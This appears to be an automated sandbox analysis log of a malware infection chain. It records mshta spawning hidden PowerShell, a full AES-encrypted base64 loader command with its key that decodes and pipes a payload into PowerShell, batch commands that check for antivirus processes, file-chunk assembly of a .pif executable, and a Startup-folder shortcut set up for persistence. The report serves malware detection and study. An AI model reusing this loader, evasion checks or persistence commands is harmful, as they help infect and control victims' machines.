              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 30253Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 30253\m Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif 30253\Identification.pif 30253\m Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003680117.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003973332.0000000002BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003585857.0000000002BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdb source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: calc.pdb source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbUGP source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.Trans
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A79F30 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,8_2_00A79F30
              Source: Producing.8.drStatic PE information: real checksum: 0xf5a21 should be: 0x30d94
              Source: ClassroomEc.exe.4.drStatic PE information: real checksum: 0x128df5 should be: 0x136e72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F3284D pushfd ; ret 2_2_04F32851
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D5035D push ebx; ret 4_2_04D5035B
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A97C59 push ecx; ret 8_2_00A97C6C

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifFile created: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pifJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifJump to dropped file
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ProducingJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifFile created: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pifJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ClassroomEc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifJump to dropped file
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ProducingJump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
